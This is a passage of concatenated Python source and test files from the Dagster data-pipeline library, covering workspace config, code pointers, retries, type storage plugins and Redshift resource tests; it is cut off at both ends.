'list_repositories',
ListRepositoriesInput(module_name=module_name, python_file=python_file),
),
ListRepositoriesResponse,
)
```
#### File: dagster/api/snapshot_partition.py
```python
from dagster import check
from dagster.core.host_representation.external_data import ExternalPartitionData
from dagster.core.host_representation.handle import RepositoryHandle
from .utils import execute_unary_api_cli_command
def sync_get_external_partition(repository_handle, partition_set_name, partition_name):
from dagster.cli.api import PartitionApiCommandArgs
check.inst_param(repository_handle, 'repository_handle', RepositoryHandle)
check.str_param(partition_set_name, 'partition_set_name')
check.str_param(partition_name, 'partition_name')
repository_origin = repository_handle.get_origin()
return check.inst(
execute_unary_api_cli_command(
repository_origin.executable_path,
'partition',
PartitionApiCommandArgs(
repository_origin=repository_origin,
partition_set_name=partition_set_name,
partition_name=partition_name,
),
),
ExternalPartitionData,
)
```
#### File: cli/workspace/config_schema.py
```python
from dagster import check
from dagster.config import Field, ScalarUnion, Selector, validate_config
from dagster.core.errors import DagsterInvalidConfigError
from dagster.utils import merge_dicts
def validate_workspace_config(workspace_config):
check.dict_param(workspace_config, 'workspace_config')
return validate_config(WORKSPACE_CONFIG_SCHEMA_WITH_LEGACY, workspace_config)
def ensure_workspace_config(workspace_config, yaml_path):
check.dict_param(workspace_config, 'workspace_config')
check.str_param(yaml_path, 'yaml_path')
validation_result = validate_workspace_config(workspace_config)
if not validation_result.success:
raise DagsterInvalidConfigError(
'Errors while loading workspace config at {}.'.format(yaml_path),
validation_result.errors,
workspace_config,
)
return validation_result
def _get_target_config():
return {
'python_file': ScalarUnion(
scalar_type=str,
non_scalar_schema={
'relative_path': str,
'attribute': Field(str, is_required=False),
'location_name': Field(str, is_required=False),
},
),
'python_module': ScalarUnion(
scalar_type=str,
non_scalar_schema={
'module_name': str,
'attribute': Field(str, is_required=False),
'location_name': Field(str, is_required=False),
},
),
}
WORKSPACE_CONFIG_SCHEMA = {
'load_from': [
Selector(
merge_dicts(
_get_target_config(),
{
'python_environment': {
'executable_path': str,
'target': Selector(_get_target_config()),
},
},
)
)
],
}
WORKSPACE_CONFIG_SCHEMA_WITH_LEGACY = Selector(
merge_dicts(
{
'repository': {
'module': Field(str, is_required=False),
'file': Field(str, is_required=False),
'fn': Field(str),
},
},
WORKSPACE_CONFIG_SCHEMA,
)
)
```
#### File: cli/workspace/workspace.py
```python
from dagster import check
from dagster.core.host_representation import RepositoryLocationHandle
class Workspace:
def __init__(self, repository_location_handles):
check.list_param(
repository_location_handles,
'repository_location_handles',
of_type=RepositoryLocationHandle,
)
self._location_handle_dict = {rlh.location_name: rlh for rlh in repository_location_handles}
@property
def repository_location_handles(self):
return list(self._location_handle_dict.values())
@property
def repository_location_names(self):
return list(self._location_handle_dict.keys())
def has_repository_location_handle(self, location_name):
check.str_param(location_name, 'location_name')
return location_name in self._location_handle_dict
def get_repository_location_handle(self, location_name):
check.str_param(location_name, 'location_name')
return self._location_handle_dict[location_name]
```
#### File: dagster/config/evaluate_value_result.py
```python
from collections import namedtuple
from dagster import check
from .errors import EvaluationError
class EvaluateValueResult(namedtuple('_EvaluateValueResult', 'success value errors')):
def __new__(cls, success, value, errors):
return super(EvaluateValueResult, cls).__new__(
cls,
check.opt_bool_param(success, 'success'),
value,
check.opt_list_param(errors, 'errors', of_type=EvaluationError),
)
@staticmethod
def for_error(error):
return EvaluateValueResult(False, None, [error])
@staticmethod
def for_errors(errors):
return EvaluateValueResult(False, None, errors)
@staticmethod
def for_value(value):
return EvaluateValueResult(True, value, None)
def errors_at_level(self, *levels):
return list(self._iterate_errors_at_level(list(levels)))
def _iterate_errors_at_level(self, levels):
check.list_param(levels, 'levels', of_type=str)
for error in self.errors:
if error.stack.levels == levels:
yield error
```
#### File: dagster/core/code_pointer.py
```python
import importlib
import inspect
import os
import sys
from abc import ABCMeta, abstractmethod
from collections import namedtuple
import six
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.serdes import whitelist_for_serdes
from dagster.seven import import_module_from_path
from dagster.utils import load_yaml_from_path
class CodePointer(six.with_metaclass(ABCMeta)):
@abstractmethod
def load_target(self):
pass
@abstractmethod
def describe(self):
pass
@staticmethod
def from_module(module_name, definition):
check.str_param(module_name, 'module_name')
check.str_param(definition, 'definition')
return ModuleCodePointer(module_name, definition)
@staticmethod
def from_python_file(python_file, definition):
check.str_param(python_file, 'python_file')
check.str_param(definition, 'definition')
return FileCodePointer(python_file=python_file, fn_name=definition)
@staticmethod
def from_legacy_repository_yaml(file_path):
check.str_param(file_path, 'file_path')
config = load_yaml_from_path(file_path)
repository_config = check.dict_elem(config, 'repository')
module_name = check.opt_str_elem(repository_config, 'module')
file_name = check.opt_str_elem(repository_config, 'file')
fn_name = check.str_elem(repository_config, 'fn')
return (
CodePointer.from_module(module_name, fn_name)
if module_name
# rebase file in config off of the path in the config file
else CodePointer.from_python_file(rebase_file(file_name, file_path), fn_name)
)
def rebase_file(relative_path_in_file, file_path_resides_in):
'''
In config files, you often put file paths that are meant to be relative
to the location of that config file. This does that calculation.
'''
check.str_param(relative_path_in_file, 'relative_path_in_file')
check.str_param(file_path_resides_in, 'file_path_resides_in')
return os.path.join(
os.path.dirname(os.path.abspath(file_path_resides_in)), relative_path_in_file
)
def load_python_file(python_file):
'''
Takes a path to a python file and returns a loaded module
'''
check.str_param(python_file, 'python_file')
module_name = os.path.splitext(os.path.basename(python_file))[0]
return import_module_from_path(module_name, python_file)
@whitelist_for_serdes
class FileCodePointer(namedtuple('_FileCodePointer', 'python_file fn_name'), CodePointer):
def __new__(cls, python_file, fn_name):
return super(FileCodePointer, cls).__new__(
cls, check.str_param(python_file, 'python_file'), check.str_param(fn_name, 'fn_name'),
)
def load_target(self):
module = load_python_file(self.python_file)
if not hasattr(module, self.fn_name):
raise DagsterInvariantViolationError(
'{name} not found at module scope in file {file}.'.format(
name=self.fn_name, file=self.python_file
)
)
return getattr(module, self.fn_name)
def describe(self):
return '{self.python_file}::{self.fn_name}'.format(self=self)
def get_cli_args(self):
return '-f {python_file} -a {fn_name}'.format(
python_file=os.path.abspath(os.path.expanduser(self.python_file)), fn_name=self.fn_name
)
@whitelist_for_serdes
class ModuleCodePointer(namedtuple('_ModuleCodePointer', 'module fn_name'), CodePointer):
def __new__(cls, module, fn_name):
return super(ModuleCodePointer, cls).__new__(
cls, check.str_param(module, 'module'), check.str_param(fn_name, 'fn_name')
)
def load_target(self):
module = importlib.import_module(self.module)
if not hasattr(module, self.fn_name):
raise DagsterInvariantViolationError(
'{name} not found in module {module}. dir: {dir}'.format(
name=self.fn_name, module=self.module, dir=dir(module)
)
)
return getattr(module, self.fn_name)
def describe(self):
return 'from {self.module} import {self.fn_name}'.format(self=self)
def get_cli_args(self):
return '-m {module} -a {fn_name}'.format(module=self.module, fn_name=self.fn_name)
def get_python_file_from_previous_stack_frame():
'''inspect.stack() lets us introspect the call stack; inspect.stack()[1] is the previous
stack frame.
In Python < 3.5, this is just a tuple, of which the python file of the previous frame is the 1st
element.
In Python 3.5+, this is a FrameInfo namedtuple instance; the python file of the previous frame
remains the 1st element.
'''
# Since this is now a function in this file, we need to go back two hops to find the
# callsite file.
previous_stack_frame = inspect.stack(0)[2]
# See: https://docs.python.org/3/library/inspect.html
if sys.version_info.major == 3 and sys.version_info.minor >= 5:
check.inst(previous_stack_frame, inspect.FrameInfo)
else:
check.inst(previous_stack_frame, tuple)
python_file = previous_stack_frame[1]
return os.path.abspath(python_file)
```
#### File: core/execution/config.py
```python
import multiprocessing
from abc import ABCMeta, abstractmethod
import six
from dagster import check
from dagster.core.definitions.reconstructable import ReconstructablePipeline
from dagster.core.execution.retries import Retries
class ExecutorConfig(six.with_metaclass(ABCMeta)): # pylint: disable=no-init
@abstractmethod
def get_engine(self):
'''Get the configured engine.
Returns:
Engine: The configured engine.'''
class InProcessExecutorConfig(ExecutorConfig):
def __init__(self, retries, marker_to_close):
self.retries = check.inst_param(retries, 'retries', Retries)
self.marker_to_close = check.opt_str_param(marker_to_close, 'marker_to_close')
def get_engine(self):
from dagster.core.engine.engine_inprocess import InProcessEngine
return InProcessEngine
class MultiprocessExecutorConfig(ExecutorConfig):
def __init__(self, pipeline, retries, max_concurrent=None):
self.pipeline = check.inst_param(pipeline, 'pipeline', ReconstructablePipeline)
self.retries = check.inst_param(retries, 'retries', Retries)
max_concurrent = max_concurrent if max_concurrent else multiprocessing.cpu_count()
self.max_concurrent = check.int_param(max_concurrent, 'max_concurrent')
def get_engine(self):
from dagster.core.engine.engine_multiprocess import MultiprocessEngine
return MultiprocessEngine
```
#### File: execution/plan/local_external_step_main.py
```python
import os
import pickle
import sys
from dagster.core.execution.plan.external_step import PICKLED_EVENTS_FILE_NAME, run_step_from_ref
from dagster.core.storage.file_manager import LocalFileHandle, LocalFileManager
def main(step_run_ref_path):
file_manager = LocalFileManager('.')
file_handle = LocalFileHandle(step_run_ref_path)
step_run_ref = pickle.loads(file_manager.read_data(file_handle))
events = list(run_step_from_ref(step_run_ref))
events_out_path = os.path.join(os.path.dirname(step_run_ref_path), PICKLED_EVENTS_FILE_NAME)
with open(events_out_path, 'wb') as events_file:
pickle.dump(events, events_file)
if __name__ == '__main__':
main(sys.argv[1])
```
#### File: core/execution/retries.py
```python
from collections import defaultdict
from enum import Enum
from dagster import Field, Selector, check
def get_retries_config():
return Field(
Selector({'enabled': {}, 'disabled': {}}), is_required=False, default_value={'enabled': {}},
)
class RetryMode(Enum):
ENABLED = 'enabled'
DISABLED = 'disabled'
# Designed for use of inner plan execution within "orchestrator" engine such as multiprocess,
# up_for_retry steps are not directly re-enqueued, deferring that to the engine.
DEFERRED = 'deferred'
class Retries:
def __init__(self, mode, previous_attempts=None):
self._mode = check.inst_param(mode, 'mode', RetryMode)
self._attempts = defaultdict(int)
for key, val in check.opt_dict_param(
previous_attempts, 'previous_attempts', key_type=str, value_type=int
).items():
self._attempts[key] = val
@property
def enabled(self):
return self._mode == RetryMode.ENABLED
@property
def disabled(self):
return self._mode == RetryMode.DISABLED
@property
def deferred(self):
return self._mode == RetryMode.DEFERRED
def get_attempt_count(self, key):
return self._attempts[key]
def mark_attempt(self, key):
self._attempts[key] += 1
def for_inner_plan(self):
if self.disabled:
return self
elif self.enabled:
return Retries(mode=RetryMode.DEFERRED, previous_attempts=dict(self._attempts))
else:
check.failed('Can not create Retries for inner plan when already in deferred mode')
@staticmethod
def from_config(config_value):
for selector, value in config_value.items():
return Retries(RetryMode(selector), value.get('previous_attempts'))
def to_config(self):
value = {self._mode.value: {}}
if self.deferred:
value[self._mode.value] = {'previous_attempts': dict(self._attempts)}
return value
@staticmethod
def disabled_mode():
return Retries(RetryMode.DISABLED)
```
#### File: core/instance/config.py
```python
import os
from dagster import Bool, Int, check
from dagster.config import Field, Permissive
from dagster.config.validate import validate_config
from dagster.core.errors import DagsterInvalidConfigError
from dagster.utils import merge_dicts
from dagster.utils.yaml_utils import load_yaml_from_globs
DAGSTER_CONFIG_YAML_FILENAME = "dagster.yaml"
def dagster_instance_config(base_dir, config_filename=DAGSTER_CONFIG_YAML_FILENAME, overrides=None):
overrides = check.opt_dict_param(overrides, 'overrides')
dagster_config_dict = merge_dicts(
load_yaml_from_globs(os.path.join(base_dir, config_filename)), overrides
)
dagster_config = validate_config(dagster_instance_config_schema(), dagster_config_dict)
if not dagster_config.success:
raise DagsterInvalidConfigError(
'Errors whilst loading dagster instance config at {}.'.format(config_filename),
dagster_config.errors,
dagster_config_dict,
)
return dagster_config.value
def config_field_for_configurable_class():
return Field({'module': str, 'class': str, 'config': Field(Permissive())}, is_required=False)
def dagster_instance_config_schema():
return {
'local_artifact_storage': config_field_for_configurable_class(),
'compute_logs': config_field_for_configurable_class(),
'run_storage': config_field_for_configurable_class(),
'event_log_storage': config_field_for_configurable_class(),
'schedule_storage': config_field_for_configurable_class(),
'scheduler': config_field_for_configurable_class(),
'run_launcher': config_field_for_configurable_class(),
'dagit': Field(
{
'execution_manager': Field(
{
'disabled': Field(Bool, is_required=False),
'max_concurrent_runs': Field(Int, is_required=False),
},
is_required=False,
),
},
is_required=False,
),
'telemetry': Field({'enabled': Field(Bool, default_value=True, is_required=False)}),
}
```
#### File: core/storage/type_storage.py
```python
from abc import ABCMeta, abstractmethod
import six
from dagster import check
class TypeStoragePlugin(six.with_metaclass(ABCMeta)): # pylint: disable=no-init
'''Base class for storage plugins.
Extend this class for (system_storage_name, dagster_type) pairs that need special handling.
'''
@classmethod
@abstractmethod
def compatible_with_storage_def(self, system_storage_def):
raise NotImplementedError()
@classmethod
@abstractmethod
def set_object(cls, intermediate_store, obj, context, dagster_type, paths):
raise NotImplementedError()
@classmethod
@abstractmethod
def get_object(cls, intermediate_store, context, dagster_type, paths):
raise NotImplementedError()
@classmethod
def required_resource_keys(cls):
return frozenset()
class TypeStoragePluginRegistry(object):
def __init__(self, types_to_register):
from dagster.core.types.dagster_type import DagsterType
types_to_register = check.opt_list_param(types_to_register, 'types_to_register', tuple)
self._registry = {}
for type_to_register, type_storage_plugin in types_to_register:
check.inst(type_to_register, DagsterType)
check.subclass(type_storage_plugin, TypeStoragePlugin)
self.register_type(type_to_register, type_storage_plugin)
def register_type(self, type_to_register, type_storage_plugin):
from dagster.core.types.dagster_type import DagsterType
check.inst_param(type_to_register, 'type_to_register', DagsterType)
check.subclass_param(type_storage_plugin, 'type_storage_plugin', TypeStoragePlugin)
check.invariant(
type_to_register.name is not None,
'Cannot register a type storage plugin for an anonymous type',
)
self._registry[type_to_register.name] = type_storage_plugin
def is_registered(self, dagster_type):
if dagster_type.name is not None and dagster_type.name in self._registry:
return True
return False
def get(self, name):
return self._registry.get(name)
def check_for_unsupported_composite_overrides(self, dagster_type):
from dagster.core.types.dagster_type import DagsterTypeKind
composite_overrides = {t.name for t in dagster_type.inner_types if t.name in self._registry}
if composite_overrides:
outer_type = 'composite type'
if dagster_type.kind == DagsterTypeKind.LIST:
if dagster_type.kind == DagsterTypeKind.NULLABLE:
outer_type = 'Optional List'
else:
outer_type = 'List'
elif dagster_type.kind == DagsterTypeKind.NULLABLE:
outer_type = 'Optional'
if len(composite_overrides) > 1:
plural = 's'
this = 'These'
has = 'have'
else:
plural = ''
this = 'This'
has = 'has'
check.not_implemented(
'You are attempting to store a {outer_type} containing type{plural} '
'{type_names} in a object store. {this} type{plural} {has} specialized storage '
'behavior (configured in the TYPE_STORAGE_PLUGIN_REGISTRY). We do not '
'currently support storing Nullables or Lists of types with customized '
'storage. See https://github.com/dagster-io/dagster/issues/1190 for '
'details.'.format(
outer_type=outer_type,
plural=plural,
this=this,
has=has,
type_names=', '.join([str(x) for x in composite_overrides]),
)
)
def construct_type_storage_plugin_registry(pipeline_def, system_storage_def):
# Needed to avoid circular dep
from dagster.core.definitions import PipelineDefinition, SystemStorageDefinition
check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)
check.inst_param(system_storage_def, 'system_storage_def', SystemStorageDefinition)
type_plugins = []
for type_obj in pipeline_def.all_dagster_types():
for auto_plugin in type_obj.auto_plugins:
if auto_plugin.compatible_with_storage_def(system_storage_def):
type_plugins.append((type_obj, auto_plugin))
return TypeStoragePluginRegistry(type_plugins)
```
#### File: core/types/python_tuple.py
```python
from dagster import check
from dagster.config.config_type import Array, ConfigAnyInstance
from dagster.core.types.dagster_type import DagsterTypeKind
from .config_schema import InputHydrationConfig
from .dagster_type import DagsterType, PythonObjectDagsterType, resolve_dagster_type
PythonTuple = PythonObjectDagsterType(tuple, 'PythonTuple', description='Represents a python tuple')
class TypedTupleInputHydrationConfig(InputHydrationConfig):
def __init__(self, dagster_types):
self._dagster_types = check.list_param(dagster_types, 'dagster_types', of_type=DagsterType)
@property
def schema_type(self):
return Array(ConfigAnyInstance)
def construct_from_config_value(self, context, config_value):
return tuple(
(
self._dagster_types[idx].input_hydration_config.construct_from_config_value(
context, item
)
for idx, item in enumerate(config_value)
)
)
class _TypedPythonTuple(DagsterType):
def __init__(self, dagster_types):
all_have_input_configs = all(
(dagster_type.input_hydration_config for dagster_type in dagster_types)
)
self.dagster_types = dagster_types
super(_TypedPythonTuple, self).__init__(
key='TypedPythonTuple' + '.'.join(map(lambda t: t.key, dagster_types)),
name=None,
input_hydration_config=(
TypedTupleInputHydrationConfig(dagster_types) if all_have_input_configs else None
),
type_check_fn=self.type_check_method,
)
def type_check_method(self, context, value):
from dagster.core.definitions.events import TypeCheck
if not isinstance(value, tuple):
return TypeCheck(
success=False,
description='Value should be a tuple, got a {value_type}'.format(
value_type=type(value)
),
)
if len(value) != len(self.dagster_types):
return TypeCheck(
success=False,
description=(
'Tuple with key {key} requires {n} entries, received {m} ' 'values'
).format(key=self.key, n=len(self.dagster_types), m=len(value)),
)
for item, dagster_type in zip(value, self.dagster_types):
item_check = dagster_type.type_check(context, item)
if not item_check.success:
return item_check
return TypeCheck(success=True)
@property
def display_name(self):
return 'Tuple[{}]'.format(
','.join([inner_type.display_name for inner_type in self.dagster_types])
)
@property
def inner_types(self):
return self.dagster_types
@property
def type_param_keys(self):
return [dt.key for dt in self.dagster_types]
def create_typed_tuple(*dagster_type_args):
dagster_types = list(map(resolve_dagster_type, dagster_type_args))
check.invariant(
not any((dagster_type.kind == DagsterTypeKind.NOTHING for dagster_type in dagster_types)),
'Cannot create a runtime tuple containing inner type Nothing. Use List for fan-in',
)
return _TypedPythonTuple(dagster_types)
class DagsterTupleApi:
def __getitem__(self, tuple_types):
check.not_none_param(tuple_types, 'tuple_types')
if isinstance(tuple_types, tuple):
return create_typed_tuple(*tuple_types)
else:
return create_typed_tuple(tuple_types)
Tuple = DagsterTupleApi()
```
#### File: workspace_tests/autodiscovery_tests/test_autodiscovery.py
```python
import pytest
from dagster import DagsterInvariantViolationError, RepositoryDefinition
from dagster.cli.workspace.autodiscovery import (
loadable_targets_from_python_file,
loadable_targets_from_python_module,
)
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import repository_def_from_pointer
from dagster.utils import file_relative_path
def test_single_repository():
single_repo_path = file_relative_path(__file__, 'single_repository.py')
loadable_targets = loadable_targets_from_python_file(single_repo_path)
assert len(loadable_targets) == 1
symbol = loadable_targets[0].attribute
assert symbol == 'single_repository'
repo_def = CodePointer.from_python_file(single_repo_path, symbol).load_target()
isinstance(repo_def, RepositoryDefinition)
assert repo_def.name == 'single_repository'
def test_double_repository():
loadable_repos = loadable_targets_from_python_file(
file_relative_path(__file__, 'double_repository.py'),
)
assert set([lr.target_definition.name for lr in loadable_repos]) == {'repo_one', 'repo_two'}
def test_single_pipeline():
single_pipeline_path = file_relative_path(__file__, 'single_pipeline.py')
loadable_targets = loadable_targets_from_python_file(single_pipeline_path)
assert len(loadable_targets) == 1
symbol = loadable_targets[0].attribute
assert symbol == 'a_pipeline'
repo_def = repository_def_from_pointer(
CodePointer.from_python_file(single_pipeline_path, symbol)
)
isinstance(repo_def, RepositoryDefinition)
assert repo_def.get_pipeline('a_pipeline')
def test_double_pipeline():
double_pipeline_path = file_relative_path(__file__, 'double_pipeline.py')
with pytest.raises(DagsterInvariantViolationError) as exc_info:
loadable_targets_from_python_file(double_pipeline_path)
assert str(exc_info.value) == (
"No repository and more than one pipeline found in \"double_pipeline\". "
"If you load a file or module directly it must either have one repository "
"or one pipeline in scope. Found pipelines defined in variables or decorated "
"functions: ['pipe_one', 'pipe_two']."
)
def test_nada():
with pytest.raises(DagsterInvariantViolationError) as exc_info:
loadable_targets_from_python_file(file_relative_path(__file__, 'nada.py'))
assert str(exc_info.value) == 'No pipelines or repositories found in "nada".'
def test_single_repository_in_module():
loadable_targets = loadable_targets_from_python_module(
'dagster.utils.test.toys.single_repository'
)
assert len(loadable_targets) == 1
symbol = loadable_targets[0].attribute
assert symbol == 'single_repository'
repo_def = CodePointer.from_module(
'dagster.utils.test.toys.single_repository', symbol
).load_target()
isinstance(repo_def, RepositoryDefinition)
assert repo_def.name == 'single_repository'
```
#### File: core_tests/storage_tests/test_assets.py
```python
from contextlib import contextmanager
import pytest
from dagster import (
AssetKey,
DagsterEventType,
Materialization,
Output,
execute_pipeline,
pipeline,
seven,
solid,
)
from dagster.core.events.log import EventRecord
from dagster.core.instance import DagsterInstance, InstanceType
from dagster.core.launcher.sync_in_memory_run_launcher import SyncInMemoryRunLauncher
from dagster.core.storage.event_log import (
ConsolidatedSqliteEventLogStorage,
InMemoryEventLogStorage,
)
from dagster.core.storage.noop_compute_log_manager import NoOpComputeLogManager
from dagster.core.storage.root import LocalArtifactStorage
from dagster.core.storage.runs import InMemoryRunStorage
def get_instance(temp_dir, event_log_storage):
return DagsterInstance(
instance_type=InstanceType.EPHEMERAL,
local_artifact_storage=LocalArtifactStorage(temp_dir),
run_storage=InMemoryRunStorage(),
event_storage=event_log_storage,
compute_log_manager=NoOpComputeLogManager(),
run_launcher=SyncInMemoryRunLauncher(),
)
@contextmanager
def create_in_memory_event_log_instance():
with seven.TemporaryDirectory() as temp_dir:
asset_storage = InMemoryEventLogStorage()
instance = get_instance(temp_dir, asset_storage)
yield [instance, asset_storage]
@contextmanager
def create_consolidated_sqlite_event_log_instance():
with seven.TemporaryDirectory() as temp_dir:
asset_storage = ConsolidatedSqliteEventLogStorage(temp_dir)
instance = get_instance(temp_dir, asset_storage)
yield [instance, asset_storage]
asset_test = pytest.mark.parametrize(
'asset_aware_context',
[create_in_memory_event_log_instance, create_consolidated_sqlite_event_log_instance,],
)
@solid
def solid_one(_):
yield Materialization(label='one', asset_key=AssetKey('asset_1'))
yield Output(1)
@solid
def solid_two(_):
yield Materialization(label='two', asset_key=AssetKey('asset_2'))
yield Materialization(label='three', asset_key=AssetKey(['path', 'to', 'asset_3']))
yield Output(1)
@solid
def solid_normalization(_):
yield Materialization(label='normalization', asset_key='path/to-asset_4')
yield Output(1)
@pipeline
def pipeline_one():
solid_one()
@pipeline
def pipeline_two():
solid_one()
solid_two()
@pipeline
def pipeline_normalization():
solid_normalization()
@asset_test
def test_asset_keys(asset_aware_context):
with asset_aware_context() as ctx:
instance, event_log_storage = ctx
execute_pipeline(pipeline_one, instance=instance)
execute_pipeline(pipeline_two, instance=instance)
asset_keys = event_log_storage.get_all_asset_keys()
assert len(asset_keys) == 3
assert set([asset_key.to_db_string() for asset_key in asset_keys]) == set(
['asset_1', 'asset_2', 'path.to.asset_3']
)
@asset_test
def test_asset_events(asset_aware_context):
with asset_aware_context() as ctx:
instance, event_log_storage = ctx
execute_pipeline(pipeline_one, instance=instance)
execute_pipeline(pipeline_two, instance=instance)
asset_events = event_log_storage.get_asset_events(AssetKey('asset_1'))
assert len(asset_events) == 2
for event in asset_events:
assert isinstance(event, EventRecord)
assert event.is_dagster_event
assert event.dagster_event.event_type == DagsterEventType.STEP_MATERIALIZATION
assert event.dagster_event.asset_key
asset_events = event_log_storage.get_asset_events(AssetKey(['path', 'to', 'asset_3']))
assert len(asset_events) == 1
@asset_test
def test_asset_run_ids(asset_aware_context):
with asset_aware_context() as ctx:
instance, event_log_storage = ctx
one = execute_pipeline(pipeline_one, instance=instance)
two = execute_pipeline(pipeline_two, instance=instance)
run_ids = event_log_storage.get_asset_run_ids(AssetKey('asset_1'))
assert set(run_ids) == set([one.run_id, two.run_id])
@asset_test
def test_asset_normalization(asset_aware_context):
with asset_aware_context() as ctx:
instance, event_log_storage = ctx
execute_pipeline(pipeline_normalization, instance=instance)
asset_keys = event_log_storage.get_all_asset_keys()
assert len(asset_keys) == 1
asset_key = asset_keys[0]
assert asset_key.to_db_string() == 'path.to.asset_4'
assert asset_key.path == ['path', 'to', 'asset_4']
```
#### File: dagster_tests/core_tests/test_output_definition.py
```python
from dagster import OutputDefinition
def test_output_definition():
output_definiton_onlyreq = OutputDefinition(dagster_type=int, name='result', is_required=True)
assert output_definiton_onlyreq.optional is False
output_definiton_none = OutputDefinition(dagster_type=int, name='result')
assert output_definiton_none.optional is False
```
#### File: dagster_graphql_tests/graphql/test_dagster_environment.py
```python
from dagster.core.code_pointer import FileCodePointer
from dagster.core.host_representation import PythonEnvRepositoryLocation, RepositoryLocationHandle
from dagster.utils import file_relative_path
def test_dagster_out_of_process_location():
env = PythonEnvRepositoryLocation(
RepositoryLocationHandle.create_out_of_process_location(
location_name='test_location',
repository_code_pointer_dict={
'test_repo': FileCodePointer(file_relative_path(__file__, 'setup.py'), 'test_repo'),
},
)
)
assert env.get_repository('test_repo')
```
#### File: dagster_aws_tests/redshift_tests/test_resources.py
```python
import os
import uuid
import boto3
import psycopg2
import pytest
from dagster_aws.redshift import FakeRedshiftResource, fake_redshift_resource, redshift_resource
from dagster import ModeDefinition, execute_solid, solid
from dagster.seven import mock
REDSHIFT_ENV = {
'resources': {
'redshift': {
'config': {
'host': 'foo',
'port': 5439,
'user': 'dagster',
'password': '<PASSWORD>',
'database': 'dev',
'schema': 'foobar',
}
}
}
}
QUERY_RESULT = [(1,)]
def mock_execute_query_conn(*_args, **_kwargs):
cursor_mock = mock.MagicMock(rowcount=1)
cursor_mock.fetchall.return_value = QUERY_RESULT
conn = mock.MagicMock(is_conn='yup')
conn.cursor.return_value.__enter__.return_value = cursor_mock
m = mock.MagicMock()
m.return_value.__enter__.return_value = conn
m.return_value = conn
return m
@solid(required_resource_keys={'redshift'})
def single_redshift_solid(context):
assert context.resources.redshift
return context.resources.redshift.execute_query('SELECT 1', fetch_results=True)
@solid(required_resource_keys={'redshift'})
def multi_redshift_solid(context):
assert context.resources.redshift
return context.resources.redshift.execute_queries(
['SELECT 1', 'SELECT 1', 'SELECT 1'], fetch_results=True
)
@mock.patch('psycopg2.connect', new_callable=mock_execute_query_conn)
def test_single_select(redshift_connect):
result = execute_solid(
single_redshift_solid,
run_config=REDSHIFT_ENV,
mode_def=ModeDefinition(resource_defs={'redshift': redshift_resource}),
)
redshift_connect.assert_called_once_with(
host='foo',
port=5439,
user='dagster',
password='<PASSWORD>',
database='dev',
schema='foobar',
connect_timeout=5,
sslmode='require',
)
assert result.success
assert result.output_value() == QUERY_RESULT
@mock.patch('psycopg2.connect', new_callable=mock_execute_query_conn)
def test_multi_select(_redshift_connect):
result = execute_solid(
multi_redshift_solid,
run_config=REDSHIFT_ENV,
mode_def=ModeDefinition(resource_defs={'redshift': redshift_resource}),
)
assert result.success
assert result.output_value() == [QUERY_RESULT] * 3
def test_fake_redshift():
fake_mode = ModeDefinition(resource_defs={'redshift': fake_redshift_resource})
result = execute_solid(single_redshift_solid, run_config=REDSHIFT_ENV, mode_def=fake_mode)
assert result.success
assert result.output_value() == FakeRedshiftResource.QUERY_RESULT
result = execute_solid(multi_redshift_solid, run_config=REDSHIFT_ENV, mode_def=fake_mode)
assert result.success
assert result.output_value() == [FakeRedshiftResource.QUERY_RESULT] * 3
REDSHIFT_CREATE_TABLE_QUERY = '''CREATE TABLE IF NOT EXISTS VENUE1(
VENUEID SMALLINT,
VENUENAME VARCHAR(100),
VENUECITY VARCHAR(30),
VENUESTATE CHAR(2),
VENUESEATS INTEGER
) DISTSTYLE EVEN;
'''
REDSHIFT_LOAD_FILE_CONTENTS = b'''
7|BMO Field|Toronto|ON|0
16|TD Garden|Boston|MA|0
23|The Palace of Auburn Hills|Auburn Hills|MI|0
28|American Airlines Arena|Miami|FL|0
37|Staples Center|Los Angeles|CA|0
42|FedExForum|Memphis|TN|0
52|PNC Arena|Raleigh|NC ,25 |0
59|Scotiabank Saddledome|Calgary|AB|0
66|SAP Center|San Jose|CA|0
73|Heinz Field|Pittsburgh|PA|65050
'''.strip()
REDSHIFT_FAILED_LOAD_QUERY = '''
SELECT le.query,
TRIM(le.err_reason) AS err_reason,
TRIM(le.filename) AS filename,
le.line_number AS line_number,
le.raw_line AS raw_line,
le.raw_field_value AS raw_value
FROM stl_load_errors le
WHERE le.query
AND le.query = pg_last_copy_id()
LIMIT 1;
'''
@pytest.mark.skipif(
'AWS_REDSHIFT_TEST_DO_IT_LIVE' not in os.environ,
reason='This test only works with a live Redshift cluster',
)
def test_live_redshift(s3_bucket):
'''
This test is based on:
https://aws.amazon.com/premiumsupport/knowledge-center/redshift-stl-load-errors/
Requires the following environment variables:
AWS_ACCOUNT_ID - AWS account ID to use
REDSHIFT_LOAD_IAM_ROLE - IAM role to use for Redshift load
REDSHIFT_ENDPOINT - Redshift URL
REDSHIFT_PASSWORD - <PASSWORD>
'''
# Put file to load on S3
file_key = uuid.uuid4().hex
client = boto3.client('s3')
client.put_object(Body=REDSHIFT_LOAD_FILE_CONTENTS, Bucket=s3_bucket, Key=file_key)
@solid(required_resource_keys={'redshift'})
def query(context):
assert context.resources.redshift
# First, create table:
context.resources.redshift.execute_query(REDSHIFT_CREATE_TABLE_QUERY)
def error_callback(error, cursor, _log):
assert (
str(error).strip()
== "Load into table 'venue1' failed. Check 'stl_load_errors' system table for details."
)
cursor.execute(REDSHIFT_FAILED_LOAD_QUERY)
res = cursor.fetchall()
assert res[0][1] == 'Char length exceeds DDL length'
assert res[0][2] == 's3://{s3_bucket}/{file_key}'.format(
s3_bucket=s3_bucket, file_key=file_key
)
assert res[0][3] == 7
assert res[0][4].strip() == '52|PNC Arena|Raleigh|NC ,25 |0'
assert res[0][5].strip() == 'NC ,25'
raise error
return context.resources.redshift.execute_query(
'''COPY venue1 FROM 's3://{s3_bucket}/{file_key}'
IAM_ROLE 'arn:aws:iam::{AWS_ACCOUNT_ID}:role/{REDSHIFT_LOAD_IAM_ROLE}'
DELIMITER '|';
'''.format(
s3_bucket=s3_bucket,
file_key=file_key,
AWS_ACCOUNT_ID=os.environ['AWS_ACCOUNT_ID'],
REDSHIFT_LOAD_IAM_ROLE=os.environ['REDSHIFT_LOAD_IAM_ROLE'],
),
fetch_results=True,
error_callback=error_callback,
)
with pytest.raises(psycopg2.InternalError):
execute_solid(
query,
run_config={
'resources': {
'redshift': {
'config': {
